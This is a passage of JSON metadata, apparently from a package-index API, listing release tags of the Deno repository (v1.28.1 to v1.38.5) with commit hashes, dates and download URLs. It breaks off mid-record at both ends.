osyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tag